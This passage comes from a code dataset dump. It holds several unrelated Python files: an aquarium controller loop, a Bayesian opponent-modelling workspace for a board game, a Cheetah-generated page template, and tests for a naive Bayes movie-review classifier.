settingsModule.ReadAtoSettings(ATO_SETTINGS_FILE)\n settingsModule.ReadTimerSettings(TIMER_SETTINGS_FILE)\n settingsModule.ReadPowerBarSettings(POWERBAR_SETTINGS_FILE)\n settingsModule.ReadMaintenanceSettings(MAINTENANCE_SETTINGS_FILE)\n settingsModule.ReadLiveSettings(LIVE_SETTINGS_FILE)\n settingsModule.ReadErrorSettings(ERROR_SETTINGS_FILE)\n settingsModule.ReadEmailSettings(EMAIL_SETTINGS_FILE)\n\n databaseModule = DatabaseModule(loggingModule)\n emailModule = EmailModule(settingsModule, loggingModule)\n\n try:\n emailModule.SendInfoEmail(\"Skrypt zostal uruchomiony\")\n except:\n loggingModule.Error(\"Error sending e-mail\")\n\n errorModule = ErrorModule(settingsModule, emailModule)\n statisticsModule = StatisticsModule(databaseModule)\n outputModule = OutputModule(settingsModule, loggingModule, errorModule)\n inputModule = InputModule(loggingModule)\n atoModule = AtoModule(settingsModule, outputModule, statisticsModule, inputModule, errorModule, loggingModule)\n tempModule = TemperatureModule(settingsModule, outputModule, statisticsModule, errorModule, loggingModule, databaseModule)\n timerModule = TimerModule(settingsModule, outputModule, errorModule, loggingModule)\n maintenanceModule = MaintenanceModule(settingsModule, outputModule, errorModule, loggingModule)\n liveModule = LiveModule(settingsModule)\n manualOverrideModule = ManualOverrideModule(settingsModule, outputModule, errorModule, loggingModule)\n\n loggingModule.Debug(\"Main script initialization done.\")\n\n #displayModule = DisplayModule()\n\n try:\n # main program loop\n while True:\n try:\n liveModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Live: {}\".format(sys.exc_info()))\n \n try:\n tempModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Temperature: {}\".format(sys.exc_info()))\n \n try:\n atoModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Ato: {}\".format(sys.exc_info()))\n \n try:\n timerModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Timer: {}\".format(sys.exc_info()))\n \n try:\n maintenanceModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany 
błąd w module Maintenance: {}\".format(sys.exc_info()))\n \n try:\n errorModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Error: {}\".format(sys.exc_info()))\n \n try:\n manualOverrideModule.Handle()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Manual override: {}\".format(sys.exc_info()))\n \n try:\n outputModule.UpdateOutputPins()\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd w module Output: {}\".format(sys.exc_info()))\n\n #displayModule.RefreshDisplay()\n\n time.sleep(0.5)\n\n except KeyboardInterrupt:\n emailModule.SendInfoEmail(\"Skrypt zostal zatrzymany\")\n\n loggingModule.Error(\"Main script interrupted from keyboard\")\n\n liveModule.Stop()\n GPIO.cleanup()\n\n except:\n emailModule.SendErrorEmail(\"Wystąpił nieoczekiwany błąd: {0}\".format(sys.exc_info()))\n\n loggingModule.Critical(\"Unexpected error: {0}\".format(sys.exc_info()))\n \n loggingModule.Exception('Got exception on main handler')\n \n liveModule.Stop()\n GPIO.cleanup()\n\n raise\n\nif __name__ == \"__main__\":\n with PidFile('AquariumComputer') as p:\n main()","sub_path":"AquariumComputerMain.py","file_name":"AquariumComputerMain.py","file_ext":"py","file_size_in_byte":5027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"155311547","text":"\"\"\"\nContains the information to implement HBA such as move history and posterior beliefs.\nEdward Stevinson\n\"\"\"\nfrom agents.max_disk_agent import MaxDiskAgent\nfrom agents.max_value_agent import MaxValueAgent\nfrom agents.mobility_agent import MobilityAgent\nimport numpy as np\n\nclass Workspace:\n # Everything currently set for HBA with two types\n \n def __init__(self):\n # Create each of the possible types\n self.type1 = MaxDiskAgent()\n self.type2 = MaxValueAgent()\n self.type3 = MobilityAgent()\n # Create a 2D prob_history\n self.prob_history = [] \n self.prob_history.append([])\n self.prob_history.append([])\n self.prob_history.append([]) \n # Create W.Str \n self.create_opp_strategies()\n self.prior = [1/3, 1/3, 1/3] # Create Prior\n self.posterior = [1/3, 1/3, 1/3] #self.prior # Create Posterior beliefs \n \n def update_iteration(self, state, lastAction):\n # Extend probability history\n self.extend_prob_history(lastAction)\n # Update posterior beliefs\n self.update_posteriors()\n # Get opp_strategies # This not done here as state already updated for the move in interest\n # self.opp_strategies = self.update_opp_strategies(state)\n \n \n def update_posteriors(self):\n \"\"\"On each turn update posterior beliefs\"\"\"\n l = self.likelihood_gtw()\n # Calculate posterior\n # Multiply the prior and likelihood\n like = []\n like.append(l[0]*self.prior[0])\n like.append(l[1]*self.prior[1])\n like.append(l[2]*self.prior[2]) \n # Create normalising constant\n summ = like[0] + like[1] + like[2]\n # Create posterior \n a = like[0]/summ \n b = like[1]/summ \n c = like[2]/summ\n self.posterior[0] = a \n self.posterior[1] = b \n self.posterior[2] = c\n \n def likelihood_gtw(self):\n \"\"\"Method that specifies how evidence accounted for (acts upon prob_history)\n Returns... 
\"\"\"\n # index of last entry\n t = len(self.prob_history[0]) - 1\n prob_array = np.asarray(self.prob_history)\n #\n a = []\n for i in range (t, -1, -1):\n a.append(i)\n if not a: # For the first iteration\n a.append(0)\n b = np.asarray(a)\n c = np.power(b, 5) # These variables affect the drop off rate\n d = c * 0.01\n w = np.subtract(10, d) \n #\n e = np.greater(w,0)\n w = e * w\n # Turn prob_history into matrix\n \n # Matrix multiply H and transpose(w)\n f = np.transpose(w)\n l_mat = np.dot(prob_array, f)\n l = l_mat.tolist()\n \n ###\n #a = self.prob_history[0][t]\n #b = self.prob_history[1][t]\n #c = self.prob_history[2][t]\n #l = [a,b,c]\n return l\n \n def create_opp_strategies(self):\n \"\"\"Initialise W.Str\"\"\"\n # Create 2D list\n self.opp_strategies = []\n self.opp_strategies.append([]) \n self.opp_strategies.append([])\n self.opp_strategies.append([])\n \n def update_opp_strategies(self, state, legal_moves):\n \"\"\"Return what moves the opponent would make (Equivalent to W.Str)\n Note that often there will be multiple moves per turn\"\"\"\n # Fill the list with the possible moves\n self.opp_strategies[0] = self.type1.get_all_actions(state, legal_moves)\n self.opp_strategies[1] = self.type2.get_all_actions(state, legal_moves)\n self.opp_strategies[2] = self.type3.get_all_actions(state, legal_moves)\n \n def extend_prob_history(self, lastAction):\n \"\"\"Update prob_history\"\"\"\n # lastAction is opposition's action from the last turn\n # Iterate for each type\n for i in (0,1,2):\n \n if not lastAction: # For the case when opposition had no moves in the past stage\n self.prob_history[0].append(1)\n self.prob_history[1].append(1)\n self.prob_history[2].append(1)\n break\n \n if not self.opp_strategies[i]: # For the case when this type had no possible actions in the past stage\n self.prob_history[i].append(0)\n continue\n \n # If the action matches one this type would have made, record 1, else 0\n if lastAction in self.opp_strategies[i]: \n self.prob_history[i].append(1)\n else:\n self.prob_history[i].append(0)\n\n \n ","sub_path":"PYTHON/game/workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":5034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"498289722","text":"#!/usr/bin/env python\n\n\n\n\n##################################################\n## DEPENDENCIES\nimport sys\nimport os\nimport os.path\nimport __builtin__\nfrom os.path import getmtime, exists\nimport time\nimport types\nfrom Cheetah.Version import MinCompatibleVersion as RequiredCheetahVersion\nfrom Cheetah.Version import MinCompatibleVersionTuple as RequiredCheetahVersionTuple\nfrom Cheetah.Template import Template\nfrom Cheetah.DummyTransaction import *\nfrom Cheetah.NameMapper import NotFound, valueForName, valueFromSearchList, valueFromFrameOrSearchList\nfrom Cheetah.CacheRegion import CacheRegion\nimport Cheetah.Filters as Filters\nimport Cheetah.ErrorCatchers as ErrorCatchers\nfrom io360.includes.urls import links\n\n##################################################\n## MODULE CONSTANTS\nVFFSL=valueFromFrameOrSearchList\nVFSL=valueFromSearchList\nVFN=valueForName\ncurrentTime=time.time\n__CHEETAH_version__ = '2.4.1'\n__CHEETAH_versionTuple__ = (2, 4, 1, 'final', 0)\n__CHEETAH_genTime__ = 1266283030.253588\n__CHEETAH_genTimestamp__ = 'Mon Feb 15 17:17:10 2010'\n__CHEETAH_src__ = 'site.tmpl'\n__CHEETAH_srcLastModified__ = 'Mon Aug 10 21:09:04 2009'\n__CHEETAH_docstring__ = 'Autogenerated by Cheetah: The Python-Powered Template 
Engine'\n\nif __CHEETAH_versionTuple__ < RequiredCheetahVersionTuple:\n raise AssertionError(\n 'This template was compiled with Cheetah version'\n ' %s. Templates compiled before version %s must be recompiled.'%(\n __CHEETAH_version__, RequiredCheetahVersion))\n\n##################################################\n## CLASSES\n\nclass site(Template):\n\n ##################################################\n ## CHEETAH GENERATED METHODS\n\n\n def __init__(self, *args, **KWs):\n\n super(site, self).__init__(*args, **KWs)\n if not self._CHEETAH__instanceInitialized:\n cheetahKWArgs = {}\n allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()\n for k,v in KWs.items():\n if k in allowedKWs: cheetahKWArgs[k] = v\n self._initCheetahInstance(**cheetahKWArgs)\n \n\n def scripts(self, **KWS):\n\n\n\n ## CHEETAH: generated from #block scripts at line 8, col 1.\n trans = KWS.get(\"trans\")\n if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):\n trans = self.transaction # is None unless self.awake() was called\n if not trans:\n trans = DummyTransaction()\n _dummyTrans = True\n else: _dummyTrans = False\n write = trans.response().write\n SL = self._CHEETAH__searchList\n _filter = self._CHEETAH__currentFilter\n \n ########################################\n ## START - generated method body\n \n \n ########################################\n ## END - generated method body\n \n return _dummyTrans and trans.response().getvalue() or \"\"\n \n\n def style(self, **KWS):\n\n\n\n ## CHEETAH: generated from #block style at line 11, col 1.\n trans = KWS.get(\"trans\")\n if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):\n trans = self.transaction # is None unless self.awake() was called\n if not trans:\n trans = DummyTransaction()\n _dummyTrans = True\n else: _dummyTrans = False\n write = trans.response().write\n SL = self._CHEETAH__searchList\n _filter = self._CHEETAH__currentFilter\n \n ########################################\n ## START - generated method body\n \n \n ########################################\n ## END - generated method body\n \n return _dummyTrans and trans.response().getvalue() or \"\"\n \n\n def body(self, **KWS):\n\n\n\n ## CHEETAH: generated from #block body at line 20, col 1.\n trans = KWS.get(\"trans\")\n if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):\n trans = self.transaction # is None unless self.awake() was called\n if not trans:\n trans = DummyTransaction()\n _dummyTrans = True\n else: _dummyTrans = False\n write = trans.response().write\n SL = self._CHEETAH__searchList\n _filter = self._CHEETAH__currentFilter\n \n ########################################\n ## START - generated method body\n \n \n ########################################\n ## END - generated method body\n \n return _dummyTrans and trans.response().getvalue() or \"\"\n \n\n def respond(self, trans=None):\n\n\n\n ## CHEETAH: main method generated for this template\n if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):\n trans = self.transaction # is None unless self.awake() was called\n if not trans:\n trans = DummyTransaction()\n _dummyTrans = True\n else: _dummyTrans = False\n write = trans.response().write\n SL = self._CHEETAH__searchList\n _filter = self._CHEETAH__currentFilter\n \n ########################################\n ## START - generated method body\n \n write(u'''\n\n\n\n\nio360\n''')\n self.scripts(trans=trans)\n write(u'''\n\n\n\n\n

        io360

        \n\n''')\n self.body(trans=trans)\n write(u'''\n\n''')\n \n ########################################\n ## END - generated method body\n \n return _dummyTrans and trans.response().getvalue() or \"\"\n \n ##################################################\n ## CHEETAH GENERATED ATTRIBUTES\n\n\n _CHEETAH__instanceInitialized = False\n\n _CHEETAH_version = __CHEETAH_version__\n\n _CHEETAH_versionTuple = __CHEETAH_versionTuple__\n\n _CHEETAH_genTime = __CHEETAH_genTime__\n\n _CHEETAH_genTimestamp = __CHEETAH_genTimestamp__\n\n _CHEETAH_src = __CHEETAH_src__\n\n _CHEETAH_srcLastModified = __CHEETAH_srcLastModified__\n\n _mainCheetahMethod_for_site= 'respond'\n\n## END CLASS DEFINITION\n\nif not hasattr(site, '_initCheetahAttributes'):\n templateAPIClass = getattr(site, '_CHEETAH_templateClass', Template)\n templateAPIClass._addCheetahPlumbingCodeToClass(site)\n\n\n# CHEETAH was developed by Tavis Rudd and Mike Orr\n# with code, advice and input from many other volunteers.\n# For more information visit http://www.CheetahTemplate.org/\n\n##################################################\n## if run from command line:\nif __name__ == '__main__':\n from Cheetah.TemplateCmdLineIface import CmdLineIface\n CmdLineIface(templateObj=site()).run()\n\n\n","sub_path":"service/io360/server/www/templates/site.py","file_name":"site.py","file_ext":"py","file_size_in_byte":7008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"221993414","text":"import numpy as np\nfrom sklearn.naive_bayes import GaussianNB\n\nfrom bayes import *\n\n# These are hardcoded but you can change to your directory.\n# I'll change this during testing.\nneg_dir = 'review_polarity/txt_sentoken/neg'\npos_dir = 'review_polarity/txt_sentoken/pos'\n\nNEG3 = ['disconnect', 'phone', 'line', 'don', 'accept', 'charges', 'avoid', 'wretched',\n 'melodramatic', 'sisterhood', 'dramedy', 'hanging', 'figured', 'needed', 'touch',\n 'feminine', 'hanging', 'like', 'ideal', 'opportunity', 'film', 'features',\n 'incredible', 'palate', 'female', 'talent', 'capability', 'camera', 'brought',\n 'mind', 'sparkling', 'gems', 'sleepless', 'seattle', 'unsung', 'heroes', 'meg',\n 'ryan', 'diane', 'keaton', 'lisa', 'kudrow', 'play', 'trio', 'sisters',\n 'separated', 'career', 'judgments', 'family', 'ties', 'reunite', 'father',\n 'walter', 'matthau', 'admitted', 'hospital', 'alzheimer', 'disease', 'read',\n 'like', 'optimum', 'opportunity', 'rekindle', 'relationship', 'reflect',\n 'poignancy', 'past', 'script', 'sisters', 'delia', 'nora', 'ephron',\n 'exasperating', 'shapeless', 'dreck', 'teeming', 'emotional', 'fakery', 'hanging',\n 'overall', 'effect', 'tele', 'marketer', 'pestering', 'hours', 'don', 'option',\n 'doing', 'title', 'suggests', 'half', 'hour', 'ephron', 'sisters', 'use',\n 'telephone', 'conversations', 'basis', 'character', 'development', 'annoying',\n 'ineffective', 'device', 'cell', 'phones', 'ring', 'minutes', 'hurriedly',\n 'rushes', 'leaving', 'marginal', 'time', 'frustrated', 'viewer', 'relate',\n 'sisters', 'issues', 'problems', 'hanging', 'apple', 'pie', 'felt', 'getting',\n 'mere', 'crust', 'story', 'granted', 'genuine', 'moments', 'film', 'help',\n 'establish', 'remainder', 'strained', 'emotions', 'inferior', 'dramatic', 'muck',\n 'outrageous', 'strategy', 'hanging', 'series', 'largely', 'unrealized',\n 'attempts', 'character', 'development', 'expected', 'exhibit', 'compassion',\n 'courtesy', 'sisters', 'join', 'melodramatic', 'finale', 'able', 'identify',\n 'eve', 'ryan', 'open', 
'caring', 'daughter', 'stayed', 'father', 'moved',\n 'forward', 'pursue', 'impending', 'career', 'georgia', 'keaton', 'eldest',\n 'daughter', 'celebrating', 'fifth', 'year', 'anniversary', 'magazine', 'called',\n 'georgia', 'maddy', 'kudrow', 'soap', 'opera', 'actress', 'spends', 'time',\n 'contemplating', 'possible', 'path', 'stardom', 'nursing', 'dog', 'ryan',\n 'convincing', 'performance', 'diverting', 'cuteness', 'agreeable', 'aspects',\n 'hanging', 'kudrow', 'delightfully', 'eccentric', 'kilter', 'airhead', 'phoebe',\n 'friends', 'totally', 'wasted', 'ditto', 'keaton', 'serving', 'double', 'shift',\n 'star', 'director', 'time', 'slot', 'difficult', 'priority', 'juggle', 'frenzy',\n 'apparent', 'chick', 'flick', 'distressing', 'lack', 'chuckles', 'reliable',\n 'matthau', 'reduced', 'chaotic', 'shtick', 'given', 'character', 'situation',\n 'depressing', 'amusing', 'peak', 'form', 'humor', 'hanging', 'represented',\n 'matthau', 'nasty', 'quips', 'ryan', 'eternal', 'battle', 'aforementioned',\n 'pooch', 'swallow', 'pill', 'accounts', 'chuckles', 'expel', 'film', 'curiosity',\n 'suddenly', 'tweaked', 'discover', 'promising', 'star', 'studded', 'approach',\n 'turn', 'viciously', 'sour', 'really', 'mystery', 'predictable', 'melodramatic',\n 'filth', 'hanging', 'certainly', 'fault', 'actresses', 'pin', 'screenplay',\n 'attempts', 'clear', 'vital', 'issues', 'minutes', 'spending', 'rest', 'running',\n 'time', 'annoying', 'flurry', 'phone', 'conversations', 'certainly', 'far',\n 'label', 'rewarding', 'experience', 'hanging', 'enjoyable', 'wrong', 'number',\n 'beginning']\nPOS11 = ['rented', 'brokedown', 'palace', 'night', 'blind', 'having', 'heard', 'enjoyed',\n 'immensely', 'despite', 'flaws', 'wishing', 'experience', 'suggest', 'reserving',\n 'judgement', 'movie', 'viewing', 'entirety', 'easy', 'task', 'superficially',\n 'bears', 'unfortunate', 'necessarily', 'unintended', 'resemblance', 'movies',\n 'notably', 'return', 'paradise', 'midnight', 'express', 'result', 'nearly',\n 'review', 'brokedown', 'palace', 'subsequently', 'read', 'hopelessly',\n 'entangled', 'making', 'obvious', 'comparisons', 'consequence', 'nearly',\n 'universal', 'condemnation', 'shame', 'fine', 'film', 'view', 'movie', 'let',\n 'say', 'attempt', 'portray', 'nightmarish', 'reality', 'world', 'criminal',\n 'justice', 'midnight', 'express', 'completely', 'moral', 'dilemma',\n 'examination', 'meaning', 'friendship', 'humanity', 'heart', 'return',\n 'paradise', 'view', 'film', 'compared', 'source', 'joseph', 'conrad',\n 'acclaimed', 'novel', 'lord', 'jim', 'problematically', 'basic', 'storyline',\n 'familiar', 'american', 'teenage', 'girls', 'vacation', 'sentenced', 'spend',\n 'lives', 'thai', 'prison', 'drug', 'smuggling', 'obvious', 'set', 'involving',\n 'suave', 'man', 'shadowy', 'criminal', 'conspiracy', 'corrupt', 'world',\n 'justice', 'girls', 'alice', 'claire', 'danes', 'darlene', 'kate', 'beckinsale',\n 'life', 'long', 'buddies', 'planned', 'high', 'school', 'graduation', 'trip',\n 'hawaii', 'secretly', 'changed', 'destination', 'exotic', 'thailand', 'telling',\n 'parents', 'hotel', 'sight', 'seeing', 'includes', 'sneaking', 'luxury', 'hotel',\n 'sip', 'expensive', 'drinks', 'poolside', 'caught', 'trying', 'charge', 'wrong',\n 'room', 'minor', 'transgression', 'later', 'come', 'haunt', 'saved', 'hotel',\n 'security', 'charming', 'friendly', 'australian', 'nick', 'daniel', 'lapaine',\n 'takes', 'care', 'polished', 'execution', 'girl', 'scam', 'proceeds', 'separate',\n 'girls', 'make', 'smooth', 'moves', 'alice', 
'darlene', 'alarm', 'bells',\n 'going', 'viewers', 'present', 'nick', 'slick', 'stories', 'don', 'add', 'girls',\n 'course', 'naive', 'notice', 'long', 'happens', 'anticipating', 'inevitable',\n 'disappearance', 'fast', 'talking', 'smuggler', 'arrest', 'teenaged', 'sitting',\n 'ducks', 'airport', 'route', 'hong', 'kong', 'caught', 'holding', 'bag',\n 'literally', 'containing', 'heroin', 'just', 'predictably', 'thai', 'police',\n 'courts', 'meting', 'injustice', 'trusting', 'tourists', 'prison', 'bound',\n 'long', 'stretch', 'left', 'unanswered', 'red', 'herring', 'issue', 'girls',\n 'willing', 'accomplice', 'need', 'ready', 'answer', 'suggest', 'closer',\n 'scrutiny', 'bell', 'hop', 'girl', 'fleabag', 'hotel', 'door', 'comfortable',\n 'life', 'closed', 'girls', 'families', 'turn', 'desperation', 'noiresque',\n 'expatriate', 'lawyer', 'fixer', 'yankee', 'hank', 'pullam', 'thai', 'born',\n 'partner', 'wife', 'recurring', 'element', 'movie', 'tension', 'appearance',\n 'reality', 'expressed', 'film', 'tag', 'lines', 'trust', 'hank', 'exception',\n 'seasoned', 'movie', 'goers', 'familiar', 'pullman', 'oeuvre', 'surprises',\n 'remainder', 'movie', 'smorgasbord', 'intriguing', 'themes', 'incompletely',\n 'explored', 'short', 'hand', 'fashion', 'lou', 'diamond', 'phillips', 'instance',\n 'plays', 'delightfully', 'sinister', 'callous', 'dea', 'agent', 'appearing',\n 'casually', 'accommodating', 'hank', 'withholds', 'vital', 'information',\n 'crucial', 'moments', 'wider', 'conspiracy', 'inherently', 'powerful',\n 'somewhat', 'tired', 'premise', 'film', 'offers', 'parts', 'riveting',\n 'courtroom', 'drama', 'prison', 'story', 'potential', 'character', 'study',\n 'american', 'teens', 'relationship', 'constitutes', 'friendship', 'result',\n 'reasonably', 'engaging', 'suspenseful', 'girls', 'interaction', 'hank',\n 'investigation', 'various', 'trials', 'hearings', 'offering', 'hope', 'release',\n 'delivering', 'tension', 'does', 'foredoomed', 'possibility', 'escape',\n 'brokedown', 'palace', 'major', 'flaw', 'creators', 'tendency', 'like', 'time',\n 'constrained', 'tourists', 'frequent', 'trips', 'fascinating', 'alleys',\n 'reverse', 'direction', 'half', 'way', 'return', 'story', 'main', 'avenue',\n 'brokedown', 'palace', 'wouldn', 'good', 'movie', 'believe', 'writers',\n 'director', 'bigger', 'game', 'succeeded', 'main', 'theme', 'movie', 'like',\n 'proffered', 'location', 'freedom', 'permutations', 'ultimately', 'sub',\n 'themes', 'considered', 'window', 'dressing', 'young', 'pretty', 'alice',\n 'danes', 'old', 'soul', 'wild', 'streetwise', 'teenager', 'thirst', 'freedom',\n 'adventure', 'presented', 'perfect', 'blend', 'yin', 'yang', 'dark', 'light',\n 'cautious', 'best', 'friend', 'darlene', 'beckinsale', 'clear', 'eyed',\n 'straightforward', 'alice', 'complex', 'friend', 'comes', 'poorer', 'background',\n 'reputation', 'getting', 'trouble', 'lost', 'trust', 'including', 'father',\n 'darlene', 'life', 'track', 'aimed', 'college', 'marriage', 'kids', 'career',\n 'suburban', 'home', 'middle', 'age', 'fulfillment', 'alice', 'uncertain',\n 'unfocused', 'yearning', 'poignant', 'scene', 'film', 'shows', 'darlene',\n 'shouting', 'open', 'moat', 'visitors', 'friends', 'relatives', 'home', 'lives',\n 'continue', 'limbo', 'tellingly', 'alice', 'present', 'included', 'just',\n 'revealing', 'different', 'personalities', 'alice', 'dar', 'come', 'thailand',\n 'openness', 'delight', 'alice', 'face', 'doesn', 'read', 'simple', 'naivet',\n 'way', 'stands', 'stretches', 'friend', 'ride', 'small', 'boat', 
'reaching',\n 'sun', 'really', 'drinking', 'believes', 'freedom', 'dar', 'remains', 'seated',\n 'shade', 'brokedown', 'palace', 'begins', 'admission', 'alice', 'guilt', 'tape',\n 'recording', 'sent', 'hank', 'unintentional', 'alice', 'fault', 'responsible',\n 'persuading', 'friend', 'lie', 'parents', 'sneak', 'away', 'safety', 'hawaii',\n 'perils', 'thailand', 'try', 'petty', 'scam', 'places', 'clutches', 'evil',\n 'nick', 'case', 'misses', 'point', 'inevitable', 'confusion', 'film',\n 'beginning', 'darlene', 'obligingly', 'reminds', 'alice', 'culpability',\n 'prison', 'dar', 'course', 'willing', 'dupe', 'view', 'confers', 'innocence',\n 'mind', 'coercion', 'reluctant', 'alice', 'accompany', 'hong', 'kong', 'placed',\n 'police', 'custody', 'place', 'naive', 'confession', 'sealed', 'fate', 'dar',\n 'innocent', 'doesn', 'matter', 'alice', 'subject', 'movie', 'journey',\n 'personal', 'freedom', 'way', 'treated', 'unsympathetic', 'portrait', 'shallow',\n 'american', 'culture', 'created', 'girls', 'half', 'baked', 'sensibilities',\n 'materialistic', 'goals', 'end', 'culture', 'like', 'representatives', 'yankee',\n 'hank', 'dar', 'father', 'man', 'knows', 'grease', 'wheels', 'proves',\n 'impotent', 'government', 'face', 'girl', 'tragedy', 'thailand', 'culture',\n 'contrary', 'opinion', 'comes', 'better', 'comparison', 'amazes', 'reviewers',\n 'argued', 'point', 'extremes', 'believe', 'filmmaker', 'view', 'thai', 'culture',\n 'vastly', 'different', 'american', 'necessarily', 'inferior', 'thai', 'sole',\n 'exceptions', 'corrupt', 'official', 'spiteful', 'prison', 'spy', 'uniformly',\n 'consistent', 'behavior', 'true', 'principles', 'girls', 'shown', 'treated',\n 'better', 'certainly', 'worse', 'native', 'born', 'prison', 'stark', 'contrast',\n 'probable', 'reality', 'hellhole', 'relatively', 'clean', 'sunlit', 'prison',\n 'authorities', 'demanded', 'good', 'hygiene', 'provided', 'medical', 'care',\n 'needed', 'hard', 'manual', 'labor', 'consisted', 'picking', 'grass', 'thai',\n 'guards', 'authoritarian', 'certainly', 'routinely', 'sadistic', 'thai',\n 'justice', 'reasoning', 'thai', 'judges', 'appeal', 'hearing', 'film',\n 'penultimate', 'scene', 'devastating', 'logic', 'morality', 'freedom', 'faces',\n 'brokedown', 'palace', 'explores', 'extreme', 'freedom', 'body', 'freedom',\n 'spirit', 'settle', 'remain', 'imprisoned', 'entire', 'nation', 'roam',\n 'freedom', 'seldom', 'comes', 'price', 'movie', 'tag', 'lines', 'dream', 'far',\n 'believe', 'make', 'good', 'case', 'interpretation', 'person', 'attains',\n 'freedom', 'incarcerated', 'film', 'end', 'alice', 'finds', 'redemption',\n 'salvation', 'acceptance', 'personal', 'responsibility', 'think', 'light',\n 'bathing', 'figure', 'assembled', 'prisoners', 'final', 'scene', 'visually',\n 'signals', 'fact', 'kate', 'beckinsale', 'character', 'properly', 'likened',\n 'released', 'temple', 'bird', 'referred', 'twice', 'film', 'trained', 'fly',\n 'cage', 'thai', 'magistrate', 'observed', 'film', 'climactic', 'scene', 'issue',\n 'character', 'jamaican', 'prisoner', 'clear', 'freedom', 'achieved', 'oneself',\n 'thinks', 'movie', 'character', 'transformed', 'experiences', 'increasingly',\n 'cinema', 'landscape', 'littered', 'endless', 'permutations', 'kung', 'woman',\n 'female', 'characters', 'virtually', 'indistinguishable', 'male', 'action',\n 'figures', 'story', 'modern', 'heroine', 'reading', 'user', 'comments', 'struck',\n 'unusual', 'phenomenon', 'person', 'liked', 'movie', 'praised', 'actors',\n 'think', 'time', 'came', 'away', 'motion', 'picture', 
'possibly', 'hating',\n 'raving', 'performances', 'favor', 'rent', 'brokedown', 'palace', 'watch',\n 'open', 'mind', 'meets', 'eye']\n\nVOCAB_SUBSET100 = ['acceptable', 'accompanies', 'alek', 'allows', 'amistad', 'amnesia',\n 'anti', 'armored', 'arty', 'atrophied', 'authentically', 'barbecue',\n 'bastille', 'battles', 'beatrice', 'bedtimes', 'bolt', 'bombarded',\n 'braun', 'breathed', 'cavern', 'characers', 'charms', 'cimino',\n 'comely', 'compensating', 'contentious', 'delayed', 'deliveree',\n 'denise', 'dependant', 'deuce', 'disintegrated', 'doom', 'embarassed',\n 'enterprises', 'entrepreneur', 'eurocentrism', 'examinations',\n 'existing', 'exposure', 'fahdlan', 'fer', 'flirts', 'franken', 'gait',\n 'gloat', 'goal', 'groaning', 'groundbreaking', 'homeworld',\n 'hovertank', 'independance', 'inputs', 'instinctively',\n 'invincibility', 'kermit', 'lanai', 'lava', 'lavender', 'libidinous',\n 'locating', 'meshes', 'metamorphoses', 'moff', 'moribund', 'mortal',\n 'neptune', 'observatory', 'onstage', 'orbiting', 'overemotional',\n 'overly', 'paradise', 'paramedic', 'parent', 'paz', 'portion', 'prays',\n 'pseudonym', 'psycholically', 'quinland', 'redcoats', 'robo', 'sacred',\n 'shorten', 'silence', 'sincerely', 'solution', 'straits',\n 'supernaturally', 'taste', 'tryst', 'uneasiness', 'uninterrupted',\n 'walkway', 'wasting', 'won', 'xer', 'yield']\n\nneg = pos = None\n\ndef load():\n global neg, pos\n if neg is None or pos is None:\n neg = load_docs(neg_dir)\n pos = load_docs(pos_dir)\n return neg, pos\n\n\ndef test_load():\n neg, pos = load()\n # Pick sample docs to compare\n assert len(neg) == 1000\n assert len(pos) == 1000\n # print(neg[3])\n # print(pos[11])\n assert neg[3]==NEG3\n assert pos[11]==POS11\n\n\ndef test_vocab():\n neg, pos = load()\n V = vocab(neg,pos)\n assert len(V)==38372+1 # Add one for unknown at index 0\n\n rs = np.random.RandomState(42) # get same list back each time\n idx = rs.randint(0,len(V),size=100)\n allwords = np.array([*V.keys()])\n subset = allwords[idx]\n # print(sorted(subset))\n assert sorted(subset) == VOCAB_SUBSET100\n\n\ndef test_vectorize():\n neg, pos = load()\n V = vocab(neg,pos)\n vneg = vectorize_docs(neg, V)\n vpos = vectorize_docs(pos, V)\n allwords = np.array([*V.keys()])\n # print(list(allwords[np.where(vneg[3]>1)]))\n assert list(allwords[np.where(vneg[3] > 1)]) == \\\n ['annoying', 'attempts', 'career', 'certainly', 'character', 'chuckles',\n 'conversations', 'daughter', 'development', 'don', 'ephron', 'father', 'film',\n 'georgia', 'hanging', 'issues', 'keaton', 'kudrow', 'like', 'matthau',\n 'melodramatic', 'minutes', 'opportunity', 'phone', 'ryan', 'sisters', 'star', 'time']\n # print(list(allwords[np.where(vpos[5]>1)]))\n assert list(allwords[np.where(vpos[5] > 1)]) == \\\n ['action', 'actor', 'apart', 'ben', 'bruce', 'certainly', 'character',\n 'characters', 'day', 'don', 'fall', 'family', 'film', 'films', 'flashbacks',\n 'good', 'grown', 'heartbreaking', 'jordan', 'katie', 'life', 'like', 'lives',\n 'main', 'make', 'marriage', 'michelle', 'movies', 'nelson', 'nicely',\n 'performance', 'pfeiffer', 'picture', 'real', 'realistic', 'really', 'say',\n 'script', 'sense', 'shows', 'sophisticated', 'stepmom', 'story', 'strong',\n 'therapist', 'things', 'times', 'told', 'touching', 'viewer', 'willis',\n 'written', 'year', 'years']\n\n\ndef test_training_error():\n neg, pos = load()\n V = vocab(neg,pos)\n vneg = vectorize_docs(neg, V)\n vpos = vectorize_docs(pos, V)\n\n X = np.vstack([vneg, vpos])\n y = np.vstack(\n [np.zeros(shape=(len(vneg), 1)), 
